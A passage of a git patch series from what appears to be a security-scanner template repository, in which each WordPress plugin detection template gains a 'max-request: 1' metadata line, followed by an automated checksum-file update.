info: reference: - https://wordpress.org/plugins/tablepress/ metadata: + max-request: 1 plugin_namespace: tablepress wpscan: https://wpscan.com/plugin/tablepress tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/taxonomy-terms-order.yaml b/http/technologies/wordpress/plugins/taxonomy-terms-order.yaml index 755efd53fa..07c43b9d80 100644 --- a/http/technologies/wordpress/plugins/taxonomy-terms-order.yaml +++ b/http/technologies/wordpress/plugins/taxonomy-terms-order.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/taxonomy-terms-order/ metadata: + max-request: 1 plugin_namespace: taxonomy-terms-order wpscan: https://wpscan.com/plugin/taxonomy-terms-order tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/the-events-calendar.yaml b/http/technologies/wordpress/plugins/the-events-calendar.yaml index 0403bb4e72..83a849e11e 100644 --- a/http/technologies/wordpress/plugins/the-events-calendar.yaml +++ b/http/technologies/wordpress/plugins/the-events-calendar.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/the-events-calendar/ metadata: + max-request: 1 plugin_namespace: the-events-calendar wpscan: https://wpscan.com/plugin/the-events-calendar tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/themeisle-companion.yaml b/http/technologies/wordpress/plugins/themeisle-companion.yaml index cd2632ea05..c6100637d9 100644 --- a/http/technologies/wordpress/plugins/themeisle-companion.yaml +++ b/http/technologies/wordpress/plugins/themeisle-companion.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/themeisle-companion/ metadata: + max-request: 1 plugin_namespace: themeisle-companion wpscan: https://wpscan.com/plugin/themeisle-companion tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/tinymce-advanced.yaml b/http/technologies/wordpress/plugins/tinymce-advanced.yaml index b5f8b822c7..1f188b66c6 100644 --- a/http/technologies/wordpress/plugins/tinymce-advanced.yaml +++ b/http/technologies/wordpress/plugins/tinymce-advanced.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/tinymce-advanced/ metadata: + max-request: 1 plugin_namespace: tinymce-advanced wpscan: https://wpscan.com/plugin/tinymce-advanced tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/translatepress-multilingual.yaml b/http/technologies/wordpress/plugins/translatepress-multilingual.yaml index 85aaf7ff16..2c7b16cb44 100644 --- a/http/technologies/wordpress/plugins/translatepress-multilingual.yaml +++ b/http/technologies/wordpress/plugins/translatepress-multilingual.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/translatepress-multilingual/ metadata: + max-request: 1 plugin_namespace: translatepress-multilingual wpscan: https://wpscan.com/plugin/translatepress-multilingual tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/ultimate-addons-for-gutenberg.yaml b/http/technologies/wordpress/plugins/ultimate-addons-for-gutenberg.yaml index 0af322b728..9d6afa8d3f 100644 --- a/http/technologies/wordpress/plugins/ultimate-addons-for-gutenberg.yaml +++ b/http/technologies/wordpress/plugins/ultimate-addons-for-gutenberg.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/ultimate-addons-for-gutenberg/ metadata: + max-request: 1 plugin_namespace: ultimate-addons-for-gutenberg wpscan: https://wpscan.com/plugin/ultimate-addons-for-gutenberg tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/under-construction-page.yaml b/http/technologies/wordpress/plugins/under-construction-page.yaml index d4ac0d179e..87721a245a 100644 --- a/http/technologies/wordpress/plugins/under-construction-page.yaml +++ b/http/technologies/wordpress/plugins/under-construction-page.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/under-construction-page/ metadata: + max-request: 1 plugin_namespace: under-construction-page wpscan: https://wpscan.com/plugin/under-construction-page tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/updraftplus.yaml b/http/technologies/wordpress/plugins/updraftplus.yaml index dbbadf3cfc..45e0dead0e 100644 --- a/http/technologies/wordpress/plugins/updraftplus.yaml +++ b/http/technologies/wordpress/plugins/updraftplus.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/updraftplus/ metadata: + max-request: 1 plugin_namespace: updraftplus wpscan: https://wpscan.com/plugin/updraftplus tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/use-any-font.yaml b/http/technologies/wordpress/plugins/use-any-font.yaml index 401b0e479f..abec174ec3 100644 --- a/http/technologies/wordpress/plugins/use-any-font.yaml +++ b/http/technologies/wordpress/plugins/use-any-font.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/use-any-font/ metadata: + max-request: 1 plugin_namespace: use-any-font wpscan: https://wpscan.com/plugin/use-any-font tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/user-role-editor.yaml b/http/technologies/wordpress/plugins/user-role-editor.yaml index 6f95506748..e088ac07a6 100644 --- a/http/technologies/wordpress/plugins/user-role-editor.yaml +++ b/http/technologies/wordpress/plugins/user-role-editor.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/user-role-editor/ metadata: + max-request: 1 plugin_namespace: user-role-editor wpscan: https://wpscan.com/plugin/user-role-editor tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/velvet-blues-update-urls.yaml b/http/technologies/wordpress/plugins/velvet-blues-update-urls.yaml index 4404f87aab..8b163200bf 100644 --- a/http/technologies/wordpress/plugins/velvet-blues-update-urls.yaml +++ b/http/technologies/wordpress/plugins/velvet-blues-update-urls.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/velvet-blues-update-urls/ metadata: + max-request: 1 plugin_namespace: velvet-blues-update-urls wpscan: https://wpscan.com/plugin/velvet-blues-update-urls tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/w3-total-cache.yaml b/http/technologies/wordpress/plugins/w3-total-cache.yaml index 8995434fce..2366a7dad7 100644 --- a/http/technologies/wordpress/plugins/w3-total-cache.yaml +++ b/http/technologies/wordpress/plugins/w3-total-cache.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/w3-total-cache/ metadata: + max-request: 1 plugin_namespace: w3-total-cache wpscan: https://wpscan.com/plugin/w3-total-cache tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/webp-converter-for-media.yaml b/http/technologies/wordpress/plugins/webp-converter-for-media.yaml index 8175806cb8..71448e61e8 100644 --- a/http/technologies/wordpress/plugins/webp-converter-for-media.yaml +++ b/http/technologies/wordpress/plugins/webp-converter-for-media.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/webp-converter-for-media/ metadata: + max-request: 1 plugin_namespace: webp-converter-for-media wpscan: https://wpscan.com/plugin/webp-converter-for-media tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/webp-express.yaml b/http/technologies/wordpress/plugins/webp-express.yaml index db82bc7f43..717554b89f 100644 --- a/http/technologies/wordpress/plugins/webp-express.yaml +++ b/http/technologies/wordpress/plugins/webp-express.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/webp-express/ metadata: + max-request: 1 plugin_namespace: webp-express wpscan: https://wpscan.com/plugin/webp-express tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/widget-importer-exporter.yaml b/http/technologies/wordpress/plugins/widget-importer-exporter.yaml index 03ddae57bc..fba5c8b09c 100644 --- a/http/technologies/wordpress/plugins/widget-importer-exporter.yaml +++ b/http/technologies/wordpress/plugins/widget-importer-exporter.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/widget-importer-exporter/ metadata: + max-request: 1 plugin_namespace: widget-importer-exporter wpscan: https://wpscan.com/plugin/widget-importer-exporter tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/woo-cart-abandonment-recovery.yaml b/http/technologies/wordpress/plugins/woo-cart-abandonment-recovery.yaml index d6449bb5bf..631202198e 100644 --- a/http/technologies/wordpress/plugins/woo-cart-abandonment-recovery.yaml +++ b/http/technologies/wordpress/plugins/woo-cart-abandonment-recovery.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/woo-cart-abandonment-recovery/ metadata: + max-request: 1 plugin_namespace: woo-cart-abandonment-recovery wpscan: https://wpscan.com/plugin/woo-cart-abandonment-recovery tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/woo-checkout-field-editor-pro.yaml b/http/technologies/wordpress/plugins/woo-checkout-field-editor-pro.yaml index 2d5fdf1779..cc953078eb 100644 --- a/http/technologies/wordpress/plugins/woo-checkout-field-editor-pro.yaml +++ b/http/technologies/wordpress/plugins/woo-checkout-field-editor-pro.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/woo-checkout-field-editor-pro/ metadata: + max-request: 1 plugin_namespace: woo-checkout-field-editor-pro wpscan: https://wpscan.com/plugin/woo-checkout-field-editor-pro tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/woo-variation-swatches.yaml b/http/technologies/wordpress/plugins/woo-variation-swatches.yaml index 6b5705e20d..97ce674116 100644 --- a/http/technologies/wordpress/plugins/woo-variation-swatches.yaml +++ b/http/technologies/wordpress/plugins/woo-variation-swatches.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/woo-variation-swatches/ metadata: + max-request: 1 plugin_namespace: woo-variation-swatches wpscan: https://wpscan.com/plugin/woo-variation-swatches tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/woocommerce-gateway-paypal-express-checkout.yaml b/http/technologies/wordpress/plugins/woocommerce-gateway-paypal-express-checkout.yaml index dbcdb64bad..6d05a6f058 100644 --- a/http/technologies/wordpress/plugins/woocommerce-gateway-paypal-express-checkout.yaml +++ b/http/technologies/wordpress/plugins/woocommerce-gateway-paypal-express-checkout.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/woocommerce-gateway-paypal-express-checkout/ metadata: + max-request: 1 plugin_namespace: woocommerce-gateway-paypal-express-checkout wpscan: https://wpscan.com/plugin/woocommerce-gateway-paypal-express-checkout tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/woocommerce-gateway-stripe.yaml b/http/technologies/wordpress/plugins/woocommerce-gateway-stripe.yaml index fb9ea502ce..baf5af3bb5 100644 --- a/http/technologies/wordpress/plugins/woocommerce-gateway-stripe.yaml +++ b/http/technologies/wordpress/plugins/woocommerce-gateway-stripe.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/woocommerce-gateway-stripe/ metadata: + max-request: 1 plugin_namespace: woocommerce-gateway-stripe wpscan: https://wpscan.com/plugin/woocommerce-gateway-stripe tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/woocommerce-payments.yaml b/http/technologies/wordpress/plugins/woocommerce-payments.yaml index 48ffb25245..aa1898c4ba 100644 --- a/http/technologies/wordpress/plugins/woocommerce-payments.yaml +++ b/http/technologies/wordpress/plugins/woocommerce-payments.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/woocommerce-payments/ metadata: + max-request: 1 plugin_namespace: woocommerce-payments wpscan: https://wpscan.com/plugin/woocommerce-payments tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/woocommerce-paypal-payments.yaml b/http/technologies/wordpress/plugins/woocommerce-paypal-payments.yaml index 4fa6fc3ffe..5fae796fdd 100644 --- a/http/technologies/wordpress/plugins/woocommerce-paypal-payments.yaml +++ b/http/technologies/wordpress/plugins/woocommerce-paypal-payments.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/woocommerce-paypal-payments/ metadata: + max-request: 1 plugin_namespace: woocommerce-paypal-payments wpscan: https://wpscan.com/plugin/woocommerce-paypal-payments tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/woocommerce-pdf-invoices-packing-slips.yaml b/http/technologies/wordpress/plugins/woocommerce-pdf-invoices-packing-slips.yaml index 1c1c690fcd..22f812e2b8 100644 --- a/http/technologies/wordpress/plugins/woocommerce-pdf-invoices-packing-slips.yaml +++ b/http/technologies/wordpress/plugins/woocommerce-pdf-invoices-packing-slips.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/woocommerce-pdf-invoices-packing-slips/ metadata: + max-request: 1 plugin_namespace: woocommerce-pdf-invoices-packing-slips wpscan: https://wpscan.com/plugin/woocommerce-pdf-invoices-packing-slips tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/woocommerce-services.yaml b/http/technologies/wordpress/plugins/woocommerce-services.yaml index 4d6702d81a..c637006d26 100644 --- a/http/technologies/wordpress/plugins/woocommerce-services.yaml +++ b/http/technologies/wordpress/plugins/woocommerce-services.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/woocommerce-services/ metadata: + max-request: 1 plugin_namespace: woocommerce-services wpscan: https://wpscan.com/plugin/woocommerce-services tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/woocommerce.yaml b/http/technologies/wordpress/plugins/woocommerce.yaml index 42cb8bc409..e020507ccb 100644 --- a/http/technologies/wordpress/plugins/woocommerce.yaml +++ b/http/technologies/wordpress/plugins/woocommerce.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/woocommerce/ metadata: + max-request: 1 plugin_namespace: woocommerce wpscan: https://wpscan.com/plugin/woocommerce tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/wordfence.yaml b/http/technologies/wordpress/plugins/wordfence.yaml index 55d6effbf5..c92903fd79 100644 --- a/http/technologies/wordpress/plugins/wordfence.yaml +++ b/http/technologies/wordpress/plugins/wordfence.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/wordfence/ metadata: + max-request: 1 plugin_namespace: wordfence wpscan: https://wpscan.com/plugin/wordfence tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/wordpress-importer.yaml b/http/technologies/wordpress/plugins/wordpress-importer.yaml index 6786cab703..c25b2c1c48 100644 --- a/http/technologies/wordpress/plugins/wordpress-importer.yaml +++ b/http/technologies/wordpress/plugins/wordpress-importer.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/wordpress-importer/ metadata: + max-request: 1 plugin_namespace: wordpress-importer wpscan: https://wpscan.com/plugin/wordpress-importer tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/wordpress-seo.yaml b/http/technologies/wordpress/plugins/wordpress-seo.yaml index 784ba22c8a..4d6dd14d25 100644 --- a/http/technologies/wordpress/plugins/wordpress-seo.yaml +++ b/http/technologies/wordpress/plugins/wordpress-seo.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/wordpress-seo/ metadata: + max-request: 1 plugin_namespace: wordpress-seo wpscan: https://wpscan.com/plugin/wordpress-seo tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/worker.yaml b/http/technologies/wordpress/plugins/worker.yaml index 72ff55e58a..7ca0870ed6 100644 --- a/http/technologies/wordpress/plugins/worker.yaml +++ b/http/technologies/wordpress/plugins/worker.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/worker/ metadata: + max-request: 1 plugin_namespace: worker wpscan: https://wpscan.com/plugin/worker tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/wp-fastest-cache.yaml b/http/technologies/wordpress/plugins/wp-fastest-cache.yaml index 8cfaa0f5a9..4f0d9be568 100644 --- a/http/technologies/wordpress/plugins/wp-fastest-cache.yaml +++ b/http/technologies/wordpress/plugins/wp-fastest-cache.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/wp-fastest-cache/ metadata: + max-request: 1 plugin_namespace: wp-fastest-cache wpscan: https://wpscan.com/plugin/wp-fastest-cache tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/wp-file-manager.yaml b/http/technologies/wordpress/plugins/wp-file-manager.yaml index 85900a01a7..f3c481b824 100644 --- a/http/technologies/wordpress/plugins/wp-file-manager.yaml +++ b/http/technologies/wordpress/plugins/wp-file-manager.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/wp-file-manager/ metadata: + max-request: 1 plugin_namespace: wp-file-manager wpscan: https://wpscan.com/plugin/wp-file-manager tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/wp-google-maps.yaml b/http/technologies/wordpress/plugins/wp-google-maps.yaml index a7ccde0b49..ba214fd7ea 100644 --- a/http/technologies/wordpress/plugins/wp-google-maps.yaml +++ b/http/technologies/wordpress/plugins/wp-google-maps.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/wp-google-maps/ metadata: + max-request: 1 plugin_namespace: wp-google-maps wpscan: https://wpscan.com/plugin/wp-google-maps tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/wp-mail-smtp.yaml b/http/technologies/wordpress/plugins/wp-mail-smtp.yaml index 422664a98c..8f5fe8d9a5 100644 --- a/http/technologies/wordpress/plugins/wp-mail-smtp.yaml +++ b/http/technologies/wordpress/plugins/wp-mail-smtp.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/wp-mail-smtp/ metadata: + max-request: 1 plugin_namespace: wp-mail-smtp wpscan: https://wpscan.com/plugin/wp-mail-smtp tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/wp-maintenance-mode.yaml b/http/technologies/wordpress/plugins/wp-maintenance-mode.yaml index f0af3a748a..0458b13354 100644 --- a/http/technologies/wordpress/plugins/wp-maintenance-mode.yaml +++ b/http/technologies/wordpress/plugins/wp-maintenance-mode.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/wp-maintenance-mode/ metadata: + max-request: 1 plugin_namespace: wp-maintenance-mode wpscan: https://wpscan.com/plugin/wp-maintenance-mode tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/wp-migrate-db.yaml b/http/technologies/wordpress/plugins/wp-migrate-db.yaml index f89f1a20b3..d570be07bf 100644 --- a/http/technologies/wordpress/plugins/wp-migrate-db.yaml +++ b/http/technologies/wordpress/plugins/wp-migrate-db.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/wp-migrate-db/ metadata: + max-request: 1 plugin_namespace: wp-migrate-db wpscan: https://wpscan.com/plugin/wp-migrate-db tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/wp-multibyte-patch.yaml b/http/technologies/wordpress/plugins/wp-multibyte-patch.yaml index 01fb12d0ad..ee05e3add8 100644 --- a/http/technologies/wordpress/plugins/wp-multibyte-patch.yaml +++ b/http/technologies/wordpress/plugins/wp-multibyte-patch.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/wp-multibyte-patch/ metadata: + max-request: 1 plugin_namespace: wp-multibyte-patch wpscan: https://wpscan.com/plugin/wp-multibyte-patch tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/wp-optimize.yaml b/http/technologies/wordpress/plugins/wp-optimize.yaml index 1773857e15..df2487955f 100644 --- a/http/technologies/wordpress/plugins/wp-optimize.yaml +++ b/http/technologies/wordpress/plugins/wp-optimize.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/wp-optimize/ metadata: + max-request: 1 plugin_namespace: wp-optimize wpscan: https://wpscan.com/plugin/wp-optimize tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/wp-pagenavi.yaml b/http/technologies/wordpress/plugins/wp-pagenavi.yaml index bcd1509c68..79ff01211c 100644 --- a/http/technologies/wordpress/plugins/wp-pagenavi.yaml +++ b/http/technologies/wordpress/plugins/wp-pagenavi.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/wp-pagenavi/ metadata: + max-request: 1 plugin_namespace: wp-pagenavi wpscan: https://wpscan.com/plugin/wp-pagenavi tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/wp-reset.yaml b/http/technologies/wordpress/plugins/wp-reset.yaml index c6aca20a60..23414b3d1d 100644 --- a/http/technologies/wordpress/plugins/wp-reset.yaml +++ b/http/technologies/wordpress/plugins/wp-reset.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/wp-reset/ metadata: + max-request: 1 plugin_namespace: wp-reset wpscan: https://wpscan.com/plugin/wp-reset tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/wp-reviews-plugin-for-google.yaml b/http/technologies/wordpress/plugins/wp-reviews-plugin-for-google.yaml index 56dfdf4a59..fba45020e4 100644 --- a/http/technologies/wordpress/plugins/wp-reviews-plugin-for-google.yaml +++ b/http/technologies/wordpress/plugins/wp-reviews-plugin-for-google.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/wp-reviews-plugin-for-google/ metadata: + max-request: 1 plugin_namespace: wp-reviews-plugin-for-google wpscan: https://wpscan.com/plugin/wp-reviews-plugin-for-google tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/wp-rollback.yaml b/http/technologies/wordpress/plugins/wp-rollback.yaml index 810fc82cde..0178c8e9fb 100644 --- a/http/technologies/wordpress/plugins/wp-rollback.yaml +++ b/http/technologies/wordpress/plugins/wp-rollback.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/wp-rollback/ metadata: + max-request: 1 plugin_namespace: wp-rollback wpscan: https://wpscan.com/plugin/wp-rollback tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/wp-sitemap-page.yaml b/http/technologies/wordpress/plugins/wp-sitemap-page.yaml index 783d381ed8..a04ddc6003 100644 --- a/http/technologies/wordpress/plugins/wp-sitemap-page.yaml +++ b/http/technologies/wordpress/plugins/wp-sitemap-page.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/wp-sitemap-page/ metadata: + max-request: 1 plugin_namespace: wp-sitemap-page wpscan: https://wpscan.com/plugin/wp-sitemap-page tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/wp-smushit.yaml b/http/technologies/wordpress/plugins/wp-smushit.yaml index 8bdc600063..2ead906817 100644 --- a/http/technologies/wordpress/plugins/wp-smushit.yaml +++ b/http/technologies/wordpress/plugins/wp-smushit.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/wp-smushit/ metadata: + max-request: 1 plugin_namespace: wp-smushit wpscan: https://wpscan.com/plugin/wp-smushit tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/wp-statistics.yaml b/http/technologies/wordpress/plugins/wp-statistics.yaml index ab61cc0338..dedd2e23b6 100644 --- a/http/technologies/wordpress/plugins/wp-statistics.yaml +++ b/http/technologies/wordpress/plugins/wp-statistics.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/wp-statistics/ metadata: + max-request: 1 plugin_namespace: wp-statistics wpscan: https://wpscan.com/plugin/wp-statistics tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/wp-super-cache.yaml b/http/technologies/wordpress/plugins/wp-super-cache.yaml index 5f6fbc1f75..03cd7137a8 100644 --- a/http/technologies/wordpress/plugins/wp-super-cache.yaml +++ b/http/technologies/wordpress/plugins/wp-super-cache.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/wp-super-cache/ metadata: + max-request: 1 plugin_namespace: wp-super-cache wpscan: https://wpscan.com/plugin/wp-super-cache tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/wp-user-avatar.yaml b/http/technologies/wordpress/plugins/wp-user-avatar.yaml index d67150d038..a68d4b7d78 100644 --- a/http/technologies/wordpress/plugins/wp-user-avatar.yaml +++ b/http/technologies/wordpress/plugins/wp-user-avatar.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/wp-user-avatar/ metadata: + max-request: 1 plugin_namespace: wp-user-avatar wpscan: https://wpscan.com/plugin/wp-user-avatar tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/wpcf7-recaptcha.yaml b/http/technologies/wordpress/plugins/wpcf7-recaptcha.yaml index beeba7ca69..bf9dfc3ad8 100644 --- a/http/technologies/wordpress/plugins/wpcf7-recaptcha.yaml +++ b/http/technologies/wordpress/plugins/wpcf7-recaptcha.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/wpcf7-recaptcha/ metadata: + max-request: 1 plugin_namespace: wpcf7-recaptcha wpscan: https://wpscan.com/plugin/wpcf7-recaptcha tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/wpcf7-redirect.yaml b/http/technologies/wordpress/plugins/wpcf7-redirect.yaml index c225df7bfd..47911a86a5 100644 --- a/http/technologies/wordpress/plugins/wpcf7-redirect.yaml +++ b/http/technologies/wordpress/plugins/wpcf7-redirect.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/wpcf7-redirect/ metadata: + max-request: 1 plugin_namespace: wpcf7-redirect wpscan: https://wpscan.com/plugin/wpcf7-redirect tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/wpforms-lite.yaml b/http/technologies/wordpress/plugins/wpforms-lite.yaml index aaad04cb76..1c25b6f488 100644 --- a/http/technologies/wordpress/plugins/wpforms-lite.yaml +++ b/http/technologies/wordpress/plugins/wpforms-lite.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/wpforms-lite/ metadata: + max-request: 1 plugin_namespace: wpforms-lite wpscan: https://wpscan.com/plugin/wpforms-lite tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/wps-hide-login.yaml b/http/technologies/wordpress/plugins/wps-hide-login.yaml index ff750a7d2a..b36317acd8 100644 --- a/http/technologies/wordpress/plugins/wps-hide-login.yaml +++ b/http/technologies/wordpress/plugins/wps-hide-login.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/wps-hide-login/ metadata: + max-request: 1 plugin_namespace: wps-hide-login wpscan: https://wpscan.com/plugin/wps-hide-login tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/wpvivid-backuprestore.yaml b/http/technologies/wordpress/plugins/wpvivid-backuprestore.yaml index f1e7595ccd..5eb35dd17e 100644 --- a/http/technologies/wordpress/plugins/wpvivid-backuprestore.yaml +++ b/http/technologies/wordpress/plugins/wpvivid-backuprestore.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/wpvivid-backuprestore/ metadata: + max-request: 1 plugin_namespace: wpvivid-backuprestore wpscan: https://wpscan.com/plugin/wpvivid-backuprestore tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/yith-woocommerce-wishlist.yaml b/http/technologies/wordpress/plugins/yith-woocommerce-wishlist.yaml index 4b2769ee46..ceb2b8d600 100644 --- a/http/technologies/wordpress/plugins/yith-woocommerce-wishlist.yaml +++ b/http/technologies/wordpress/plugins/yith-woocommerce-wishlist.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/yith-woocommerce-wishlist/ metadata: + max-request: 1 plugin_namespace: yith-woocommerce-wishlist wpscan: https://wpscan.com/plugin/yith-woocommerce-wishlist tags: tech,wordpress,wp-plugin,top-100,top-200 From 40440e7c4943c868cde279bd103f4504ee502ca2 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Wed, 6 Sep 2023 08:29:34 +0000 Subject: [PATCH 0177/1090] Auto Generated Templates Checksum [Wed Sep 6 08:29:34 UTC 2023] :robot: --- templates-checksum.txt | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/templates-checksum.txt b/templates-checksum.txt index 445f190a6c..b5878bdb7a 100644 --- a/templates-checksum.txt +++ b/templates-checksum.txt @@ -3737,7 +3737,7 @@ http/exposures/backups/froxlor-database-backup.yaml:0fb55f6f7b2bd1da99d93ee3302e http/exposures/backups/php-backup-files.yaml:6cb103c5d1b0411ea1d4dfe7ab76ea9bb091ebb4 http/exposures/backups/settings-php-files.yaml:3771e96806d801cffb1487210005d2d5087c78ca http/exposures/backups/sql-dump.yaml:f8b9dca037c8252e09216225933cfd7fb9a73569 -http/exposures/backups/zip-backup-files.yaml:f1a8f2ef3615a0c9f10160c08c4114c2d8e76c15 +http/exposures/backups/zip-backup-files.yaml:3a7e10da3c00683a587c471142a1557b562eb7d4 http/exposures/configs/accueil-wampserver.yaml:fad681eaed5556d727cf838ee18b1c644069830e http/exposures/configs/airflow-configuration-exposure.yaml:df07df94c4f1f5513baf276766346dd690d811ed http/exposures/configs/alibaba-canal-info-leak.yaml:becacef64b37becfcfe2009fc4f57a7ce8fbd264 